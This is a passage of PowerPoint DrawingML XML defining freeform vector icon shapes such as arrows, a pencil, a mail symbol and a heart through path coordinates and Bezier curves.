                <a:gd name="T5" fmla="*/ 157 h 467"/>
                <a:gd name="T6" fmla="*/ 471 w 471"/>
                <a:gd name="T7" fmla="*/ 235 h 467"/>
                <a:gd name="T8" fmla="*/ 471 w 471"/>
                <a:gd name="T9" fmla="*/ 235 h 467"/>
                <a:gd name="T10" fmla="*/ 471 w 471"/>
                <a:gd name="T11" fmla="*/ 235 h 467"/>
                <a:gd name="T12" fmla="*/ 393 w 471"/>
                <a:gd name="T13" fmla="*/ 311 h 467"/>
                <a:gd name="T14" fmla="*/ 393 w 471"/>
                <a:gd name="T15" fmla="*/ 311 h 467"/>
                <a:gd name="T16" fmla="*/ 237 w 471"/>
                <a:gd name="T17" fmla="*/ 467 h 467"/>
                <a:gd name="T18" fmla="*/ 161 w 471"/>
                <a:gd name="T19" fmla="*/ 389 h 467"/>
                <a:gd name="T20" fmla="*/ 260 w 471"/>
                <a:gd name="T21" fmla="*/ 290 h 467"/>
                <a:gd name="T22" fmla="*/ 0 w 471"/>
                <a:gd name="T23" fmla="*/ 290 h 467"/>
                <a:gd name="T24" fmla="*/ 0 w 471"/>
                <a:gd name="T25" fmla="*/ 185 h 467"/>
                <a:gd name="T26" fmla="*/ 260 w 471"/>
                <a:gd name="T27" fmla="*/ 185 h 467"/>
                <a:gd name="T28" fmla="*/ 161 w 471"/>
                <a:gd name="T29" fmla="*/ 79 h 467"/>
                <a:gd name="T30" fmla="*/ 237 w 471"/>
                <a:gd name="T31" fmla="*/ 0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1" h="467">
                  <a:moveTo>
                    <a:pt x="237" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="393" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393" y="157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471" y="235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237" y="467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="79"/>
                  </a:ln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60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E7C5AB2-9319-4151-AC6A-C270B8DEA1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26532" y="1262204"/>
              <a:ext cx="584398" cy="616937"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 239 w 449"/>
                <a:gd name="T1" fmla="*/ 190 h 474"/>
                <a:gd name="T2" fmla="*/ 286 w 449"/>
                <a:gd name="T3" fmla="*/ 237 h 474"/>
                <a:gd name="T4" fmla="*/ 49 w 449"/>
                <a:gd name="T5" fmla="*/ 474 h 474"/>
                <a:gd name="T6" fmla="*/ 0 w 449"/>
                <a:gd name="T7" fmla="*/ 427 h 474"/>
                <a:gd name="T8" fmla="*/ 191 w 449"/>
                <a:gd name="T9" fmla="*/ 237 h 474"/>
                <a:gd name="T10" fmla="*/ 0 w 449"/>
                <a:gd name="T11" fmla="*/ 47 h 474"/>
                <a:gd name="T12" fmla="*/ 47 w 449"/>
                <a:gd name="T13" fmla="*/ 0 h 474"/>
                <a:gd name="T14" fmla="*/ 239 w 449"/>
                <a:gd name="T15" fmla="*/ 190 h 474"/>
                <a:gd name="T16" fmla="*/ 239 w 449"/>
                <a:gd name="T17" fmla="*/ 190 h 474"/>
                <a:gd name="T18" fmla="*/ 355 w 449"/>
                <a:gd name="T19" fmla="*/ 237 h 474"/>
                <a:gd name="T20" fmla="*/ 165 w 449"/>
                <a:gd name="T21" fmla="*/ 47 h 474"/>
                <a:gd name="T22" fmla="*/ 213 w 449"/>
                <a:gd name="T23" fmla="*/ 0 h 474"/>
                <a:gd name="T24" fmla="*/ 402 w 449"/>
                <a:gd name="T25" fmla="*/ 190 h 474"/>
                <a:gd name="T26" fmla="*/ 402 w 449"/>
                <a:gd name="T27" fmla="*/ 190 h 474"/>
                <a:gd name="T28" fmla="*/ 449 w 449"/>
                <a:gd name="T29" fmla="*/ 237 h 474"/>
                <a:gd name="T30" fmla="*/ 213 w 449"/>
                <a:gd name="T31" fmla="*/ 474 h 474"/>
                <a:gd name="T32" fmla="*/ 165 w 449"/>
                <a:gd name="T33" fmla="*/ 427 h 474"/>
                <a:gd name="T34" fmla="*/ 355 w 449"/>
                <a:gd name="T35" fmla="*/ 237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9" h="474">
                  <a:moveTo>
                    <a:pt x="239" y="190"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="286" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="190"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="355" y="237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="165" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355" y="2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25714E88-24D0-4736-9985-B7375F5BBD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07750" y="5681358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70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC7DED22-1785-476F-8121-FBB9AFA29C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321078">
              <a:off x="6751607" y="4855414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0" name="Freeform 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC0E099-275B-4B7B-8A42-DFBE9DE51A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287435" y="4726512"/>
              <a:ext cx="668338" cy="741363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 157 w 178"/>
                <a:gd name="T1" fmla="*/ 53 h 197"/>
                <a:gd name="T2" fmla="*/ 125 w 178"/>
                <a:gd name="T3" fmla="*/ 21 h 197"/>
                <a:gd name="T4" fmla="*/ 141 w 178"/>
                <a:gd name="T5" fmla="*/ 5 h 197"/>
                <a:gd name="T6" fmla="*/ 160 w 178"/>
                <a:gd name="T7" fmla="*/ 5 h 197"/>
                <a:gd name="T8" fmla="*/ 173 w 178"/>
                <a:gd name="T9" fmla="*/ 18 h 197"/>
                <a:gd name="T10" fmla="*/ 173 w 178"/>
                <a:gd name="T11" fmla="*/ 37 h 197"/>
                <a:gd name="T12" fmla="*/ 157 w 178"/>
                <a:gd name="T13" fmla="*/ 53 h 197"/>
                <a:gd name="T14" fmla="*/ 65 w 178"/>
                <a:gd name="T15" fmla="*/ 144 h 197"/>
                <a:gd name="T16" fmla="*/ 33 w 178"/>
                <a:gd name="T17" fmla="*/ 113 h 197"/>
                <a:gd name="T18" fmla="*/ 119 w 178"/>
                <a:gd name="T19" fmla="*/ 28 h 197"/>
                <a:gd name="T20" fmla="*/ 151 w 178"/>
                <a:gd name="T21" fmla="*/ 59 h 197"/>
                <a:gd name="T22" fmla="*/ 65 w 178"/>
                <a:gd name="T23" fmla="*/ 144 h 197"/>
                <a:gd name="T24" fmla="*/ 8 w 178"/>
                <a:gd name="T25" fmla="*/ 170 h 197"/>
                <a:gd name="T26" fmla="*/ 27 w 178"/>
                <a:gd name="T27" fmla="*/ 119 h 197"/>
                <a:gd name="T28" fmla="*/ 59 w 178"/>
                <a:gd name="T29" fmla="*/ 150 h 197"/>
                <a:gd name="T30" fmla="*/ 8 w 178"/>
                <a:gd name="T31" fmla="*/ 170 h 197"/>
                <a:gd name="T32" fmla="*/ 150 w 178"/>
                <a:gd name="T33" fmla="*/ 181 h 197"/>
                <a:gd name="T34" fmla="*/ 158 w 178"/>
                <a:gd name="T35" fmla="*/ 189 h 197"/>
                <a:gd name="T36" fmla="*/ 150 w 178"/>
                <a:gd name="T37" fmla="*/ 197 h 197"/>
                <a:gd name="T38" fmla="*/ 8 w 178"/>
                <a:gd name="T39" fmla="*/ 197 h 197"/>
                <a:gd name="T40" fmla="*/ 0 w 178"/>
                <a:gd name="T41" fmla="*/ 189 h 197"/>
                <a:gd name="T42" fmla="*/ 8 w 178"/>
                <a:gd name="T43" fmla="*/ 181 h 197"/>
                <a:gd name="T44" fmla="*/ 150 w 178"/>
                <a:gd name="T45" fmla="*/ 18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" h="197">
                  <a:moveTo>
                    <a:pt x="157" y="53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6" y="0"/>
                    <a:pt x="155" y="0"/>
                    <a:pt x="160" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="18"/>
                    <a:pt x="173" y="18"/>
                    <a:pt x="173" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="23"/>
                    <a:pt x="178" y="32"/>
                    <a:pt x="173" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="157" y="53"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="65" y="144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="113"/>
                    <a:pt x="33" y="113"/>
                    <a:pt x="33" y="113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51" y="59"/>
                    <a:pt x="151" y="59"/>
                    <a:pt x="151" y="59"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="65" y="144"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="8" y="170"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="119"/>
                    <a:pt x="27" y="119"/>
                    <a:pt x="27" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="150"/>
                    <a:pt x="59" y="150"/>
                    <a:pt x="59" y="150"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="170"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="181"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="181"/>
                    <a:pt x="158" y="185"/>
                    <a:pt x="158" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="194"/>
                    <a:pt x="154" y="197"/>
                    <a:pt x="150" y="197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4" y="197"/>
                    <a:pt x="0" y="194"/>
                    <a:pt x="0" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="185"/>
                    <a:pt x="4" y="181"/>
                    <a:pt x="8" y="181"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="1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72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1771CE-B3A3-468A-89C4-40B09B427C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3251596">
              <a:off x="-8378" y="6098394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73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7401E4E2-4431-4521-82B6-91738F03F6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89464" y="3905155"/>
              <a:ext cx="752475" cy="700088"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 200"/>
                <a:gd name="T1" fmla="*/ 100 h 186"/>
                <a:gd name="T2" fmla="*/ 184 w 200"/>
                <a:gd name="T3" fmla="*/ 56 h 186"/>
                <a:gd name="T4" fmla="*/ 145 w 200"/>
                <a:gd name="T5" fmla="*/ 90 h 186"/>
                <a:gd name="T6" fmla="*/ 100 w 200"/>
                <a:gd name="T7" fmla="*/ 129 h 186"/>
                <a:gd name="T8" fmla="*/ 69 w 200"/>
                <a:gd name="T9" fmla="*/ 103 h 186"/>
                <a:gd name="T10" fmla="*/ 18 w 200"/>
                <a:gd name="T11" fmla="*/ 148 h 186"/>
                <a:gd name="T12" fmla="*/ 36 w 200"/>
                <a:gd name="T13" fmla="*/ 160 h 186"/>
                <a:gd name="T14" fmla="*/ 109 w 200"/>
                <a:gd name="T15" fmla="*/ 160 h 186"/>
                <a:gd name="T16" fmla="*/ 121 w 200"/>
                <a:gd name="T17" fmla="*/ 176 h 186"/>
                <a:gd name="T18" fmla="*/ 20 w 200"/>
                <a:gd name="T19" fmla="*/ 176 h 186"/>
                <a:gd name="T20" fmla="*/ 0 w 200"/>
                <a:gd name="T21" fmla="*/ 156 h 186"/>
                <a:gd name="T22" fmla="*/ 0 w 200"/>
                <a:gd name="T23" fmla="*/ 20 h 186"/>
                <a:gd name="T24" fmla="*/ 20 w 200"/>
                <a:gd name="T25" fmla="*/ 0 h 186"/>
                <a:gd name="T26" fmla="*/ 180 w 200"/>
                <a:gd name="T27" fmla="*/ 0 h 186"/>
                <a:gd name="T28" fmla="*/ 200 w 200"/>
                <a:gd name="T29" fmla="*/ 20 h 186"/>
                <a:gd name="T30" fmla="*/ 200 w 200"/>
                <a:gd name="T31" fmla="*/ 119 h 186"/>
                <a:gd name="T32" fmla="*/ 184 w 200"/>
                <a:gd name="T33" fmla="*/ 100 h 186"/>
                <a:gd name="T34" fmla="*/ 16 w 200"/>
                <a:gd name="T35" fmla="*/ 126 h 186"/>
                <a:gd name="T36" fmla="*/ 55 w 200"/>
                <a:gd name="T37" fmla="*/ 90 h 186"/>
                <a:gd name="T38" fmla="*/ 16 w 200"/>
                <a:gd name="T39" fmla="*/ 55 h 186"/>
                <a:gd name="T40" fmla="*/ 16 w 200"/>
                <a:gd name="T41" fmla="*/ 126 h 186"/>
                <a:gd name="T42" fmla="*/ 164 w 200"/>
                <a:gd name="T43" fmla="*/ 16 h 186"/>
                <a:gd name="T44" fmla="*/ 36 w 200"/>
                <a:gd name="T45" fmla="*/ 16 h 186"/>
                <a:gd name="T46" fmla="*/ 16 w 200"/>
                <a:gd name="T47" fmla="*/ 31 h 186"/>
                <a:gd name="T48" fmla="*/ 100 w 200"/>
                <a:gd name="T49" fmla="*/ 106 h 186"/>
                <a:gd name="T50" fmla="*/ 184 w 200"/>
                <a:gd name="T51" fmla="*/ 33 h 186"/>
                <a:gd name="T52" fmla="*/ 164 w 200"/>
                <a:gd name="T53" fmla="*/ 16 h 186"/>
                <a:gd name="T54" fmla="*/ 160 w 200"/>
                <a:gd name="T55" fmla="*/ 106 h 186"/>
                <a:gd name="T56" fmla="*/ 200 w 200"/>
                <a:gd name="T57" fmla="*/ 146 h 186"/>
                <a:gd name="T58" fmla="*/ 160 w 200"/>
                <a:gd name="T59" fmla="*/ 186 h 186"/>
                <a:gd name="T60" fmla="*/ 120 w 200"/>
                <a:gd name="T61" fmla="*/ 146 h 186"/>
                <a:gd name="T62" fmla="*/ 160 w 200"/>
                <a:gd name="T63" fmla="*/ 106 h 186"/>
                <a:gd name="T64" fmla="*/ 152 w 200"/>
                <a:gd name="T65" fmla="*/ 176 h 186"/>
                <a:gd name="T66" fmla="*/ 168 w 200"/>
                <a:gd name="T67" fmla="*/ 176 h 186"/>
                <a:gd name="T68" fmla="*/ 168 w 200"/>
                <a:gd name="T69" fmla="*/ 163 h 186"/>
                <a:gd name="T70" fmla="*/ 152 w 200"/>
                <a:gd name="T71" fmla="*/ 163 h 186"/>
                <a:gd name="T72" fmla="*/ 152 w 200"/>
                <a:gd name="T73" fmla="*/ 176 h 186"/>
                <a:gd name="T74" fmla="*/ 152 w 200"/>
                <a:gd name="T75" fmla="*/ 156 h 186"/>
                <a:gd name="T76" fmla="*/ 168 w 200"/>
                <a:gd name="T77" fmla="*/ 156 h 186"/>
                <a:gd name="T78" fmla="*/ 168 w 200"/>
                <a:gd name="T79" fmla="*/ 116 h 186"/>
                <a:gd name="T80" fmla="*/ 152 w 200"/>
                <a:gd name="T81" fmla="*/ 116 h 186"/>
                <a:gd name="T82" fmla="*/ 152 w 200"/>
                <a:gd name="T83" fmla="*/ 15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0" h="186">
                  <a:moveTo>
                    <a:pt x="184" y="100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="56"/>
                    <a:pt x="184" y="56"/>
                    <a:pt x="184" y="56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ubicBezTo>
                    <a:pt x="109" y="160"/>
                    <a:pt x="109" y="160"/>
                    <a:pt x="109" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="166"/>
                    <a:pt x="116" y="171"/>
                    <a:pt x="121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9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195" y="104"/>
                    <a:pt x="191" y="106"/>
                    <a:pt x="184" y="100"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="16" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="90"/>
                    <a:pt x="55" y="90"/>
                    <a:pt x="55" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="55"/>
                    <a:pt x="16" y="55"/>
                    <a:pt x="16" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="126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9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  <a:moveTo>
                    <a:pt x="160" y="106"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="106"/>
                    <a:pt x="200" y="124"/>
                    <a:pt x="200" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="168"/>
                    <a:pt x="182" y="186"/>
                    <a:pt x="160" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="186"/>
                    <a:pt x="120" y="168"/>
                    <a:pt x="120" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="124"/>
                    <a:pt x="138" y="106"/>
                    <a:pt x="160" y="106"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="152" y="176"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="176"/>
                    <a:pt x="168" y="176"/>
                    <a:pt x="168" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="163"/>
                    <a:pt x="168" y="163"/>
                    <a:pt x="168" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="163"/>
                    <a:pt x="152" y="163"/>
                    <a:pt x="152" y="163"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="176"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="152" y="156"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="156"/>
                    <a:pt x="168" y="156"/>
                    <a:pt x="168" y="15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52" y="116"/>
                    <a:pt x="152" y="116"/>
                    <a:pt x="152" y="116"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152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74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66354E5-49BD-4353-89E1-21CFB02120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402556">
              <a:off x="9876487" y="5447298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75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{008ED24F-3BE2-462A-8FCC-B2A1AD70A4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825882" y="1647445"/>
              <a:ext cx="735013" cy="684213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 196"/>
                <a:gd name="T1" fmla="*/ 181 h 182"/>
                <a:gd name="T2" fmla="*/ 98 w 196"/>
                <a:gd name="T3" fmla="*/ 182 h 182"/>
                <a:gd name="T4" fmla="*/ 98 w 196"/>
                <a:gd name="T5" fmla="*/ 181 h 182"/>
                <a:gd name="T6" fmla="*/ 98 w 196"/>
                <a:gd name="T7" fmla="*/ 182 h 182"/>
                <a:gd name="T8" fmla="*/ 98 w 196"/>
                <a:gd name="T9" fmla="*/ 181 h 182"/>
                <a:gd name="T10" fmla="*/ 2 w 196"/>
                <a:gd name="T11" fmla="*/ 54 h 182"/>
                <a:gd name="T12" fmla="*/ 2 w 196"/>
                <a:gd name="T13" fmla="*/ 45 h 182"/>
                <a:gd name="T14" fmla="*/ 50 w 196"/>
                <a:gd name="T15" fmla="*/ 0 h 182"/>
                <a:gd name="T16" fmla="*/ 98 w 196"/>
                <a:gd name="T17" fmla="*/ 39 h 182"/>
                <a:gd name="T18" fmla="*/ 145 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 182"/>
                <a:gd name="T20" fmla="*/ 193 w 196"/>
                <a:gd name="T21" fmla="*/ 45 h 182"/>
                <a:gd name="T22" fmla="*/ 193 w 196"/>
                <a:gd name="T23" fmla="*/ 54 h 182"/>
                <a:gd name="T24" fmla="*/ 98 w 196"/>
                <a:gd name="T25" fmla="*/ 181 h 182"/>
                <a:gd name="T26" fmla="*/ 169 w 196"/>
                <a:gd name="T27" fmla="*/ 58 h 182"/>
                <a:gd name="T28" fmla="*/ 142 w 196"/>
                <a:gd name="T29" fmla="*/ 22 h 182"/>
                <a:gd name="T30" fmla="*/ 98 w 196"/>
                <a:gd name="T31" fmla="*/ 68 h 182"/>
                <a:gd name="T32" fmla="*/ 54 w 196"/>
                <a:gd name="T33" fmla="*/ 22 h 182"/>
                <a:gd name="T34" fmla="*/ 25 w 196"/>
                <a:gd name="T35" fmla="*/ 58 h 182"/>
                <a:gd name="T36" fmla="*/ 25 w 196"/>
                <a:gd name="T37" fmla="*/ 64 h 182"/>
                <a:gd name="T38" fmla="*/ 97 w 196"/>
                <a:gd name="T39" fmla="*/ 151 h 182"/>
                <a:gd name="T40" fmla="*/ 97 w 196"/>
                <a:gd name="T41" fmla="*/ 151 h 182"/>
                <a:gd name="T42" fmla="*/ 98 w 196"/>
                <a:gd name="T43" fmla="*/ 151 h 182"/>
                <a:gd name="T44" fmla="*/ 98 w 196"/>
                <a:gd name="T45" fmla="*/ 151 h 182"/>
                <a:gd name="T46" fmla="*/ 98 w 196"/>
                <a:gd name="T47" fmla="*/ 151 h 182"/>
                <a:gd name="T48" fmla="*/ 169 w 196"/>
                <a:gd name="T49" fmla="*/ 64 h 182"/>
                <a:gd name="T50" fmla="*/ 169 w 196"/>
                <a:gd name="T51" fmla="*/ 5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6" h="182">
                  <a:moveTo>
                    <a:pt x="98" y="181"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="181"/>
                    <a:pt x="98" y="182"/>
                    <a:pt x="98" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="182"/>
                    <a:pt x="98" y="182"/>
                    <a:pt x="98" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="182"/>
                    <a:pt x="98" y="182"/>
                    <a:pt x="98" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="182"/>
                    <a:pt x="98" y="181"/>
                    <a:pt x="98" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="117"/>
                    <a:pt x="2" y="54"/>
                    <a:pt x="2" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="54"/>
                    <a:pt x="2" y="52"/>
                    <a:pt x="2" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="20"/>
                    <a:pt x="24" y="0"/>
                    <a:pt x="50" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="0"/>
                    <a:pt x="98" y="39"/>
                    <a:pt x="98" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="39"/>
                    <a:pt x="102" y="0"/>
                    <a:pt x="145" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="193" y="20"/>
                    <a:pt x="193" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="52"/>
                    <a:pt x="193" y="54"/>
                    <a:pt x="193" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="54"/>
                    <a:pt x="196" y="117"/>
                    <a:pt x="98" y="181"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="169" y="58"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="40"/>
                    <a:pt x="161" y="22"/>
                    <a:pt x="142" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="22"/>
                    <a:pt x="98" y="68"/>
                    <a:pt x="98" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="68"/>
                    <a:pt x="85" y="22"/>
                    <a:pt x="54" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="22"/>
                    <a:pt x="25" y="40"/>
                    <a:pt x="25" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="62"/>
                    <a:pt x="25" y="64"/>
                    <a:pt x="25" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="64"/>
                    <a:pt x="28" y="105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168" y="105"/>
                    <a:pt x="169" y="64"/>
                    <a:pt x="169" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="64"/>
                    <a:pt x="169" y="62"/>
                    <a:pt x="169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77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{232482D8-2818-40EE-88B4-C33D69E6FA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861685">
              <a:off x="8012972" y="5636542"/>
              <a:ext cx="750888" cy="738188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 200"/>
                <a:gd name="T1" fmla="*/ 194 h 196"/>
                <a:gd name="T2" fmla="*/ 120 w 200"/>
                <a:gd name="T3" fmla="*/ 154 h 196"/>
                <a:gd name="T4" fmla="*/ 160 w 200"/>
                <a:gd name="T5" fmla="*/ 114 h 196"/>
                <a:gd name="T6" fmla="*/ 200 w 200"/>
                <a:gd name="T7" fmla="*/ 154 h 196"/>
                <a:gd name="T8" fmla="*/ 160 w 200"/>
                <a:gd name="T9" fmla="*/ 194 h 196"/>
                <a:gd name="T10" fmla="*/ 184 w 200"/>
                <a:gd name="T11" fmla="*/ 148 h 196"/>
                <a:gd name="T12" fmla="*/ 168 w 200"/>
                <a:gd name="T13" fmla="*/ 148 h 196"/>
                <a:gd name="T14" fmla="*/ 168 w 200"/>
                <a:gd name="T15" fmla="*/ 132 h 196"/>
                <a:gd name="T16" fmla="*/ 152 w 200"/>
                <a:gd name="T17" fmla="*/ 132 h 196"/>
                <a:gd name="T18" fmla="*/ 152 w 200"/>
                <a:gd name="T19" fmla="*/ 148 h 196"/>
                <a:gd name="T20" fmla="*/ 136 w 200"/>
                <a:gd name="T21" fmla="*/ 148 h 196"/>
                <a:gd name="T22" fmla="*/ 136 w 200"/>
                <a:gd name="T23" fmla="*/ 164 h 196"/>
                <a:gd name="T24" fmla="*/ 152 w 200"/>
                <a:gd name="T25" fmla="*/ 164 h 196"/>
                <a:gd name="T26" fmla="*/ 152 w 200"/>
                <a:gd name="T27" fmla="*/ 180 h 196"/>
                <a:gd name="T28" fmla="*/ 168 w 200"/>
                <a:gd name="T29" fmla="*/ 180 h 196"/>
                <a:gd name="T30" fmla="*/ 168 w 200"/>
                <a:gd name="T31" fmla="*/ 164 h 196"/>
                <a:gd name="T32" fmla="*/ 184 w 200"/>
                <a:gd name="T33" fmla="*/ 164 h 196"/>
                <a:gd name="T34" fmla="*/ 184 w 200"/>
                <a:gd name="T35" fmla="*/ 148 h 196"/>
                <a:gd name="T36" fmla="*/ 80 w 200"/>
                <a:gd name="T37" fmla="*/ 128 h 196"/>
                <a:gd name="T38" fmla="*/ 16 w 200"/>
                <a:gd name="T39" fmla="*/ 64 h 196"/>
                <a:gd name="T40" fmla="*/ 80 w 200"/>
                <a:gd name="T41" fmla="*/ 0 h 196"/>
                <a:gd name="T42" fmla="*/ 144 w 200"/>
                <a:gd name="T43" fmla="*/ 64 h 196"/>
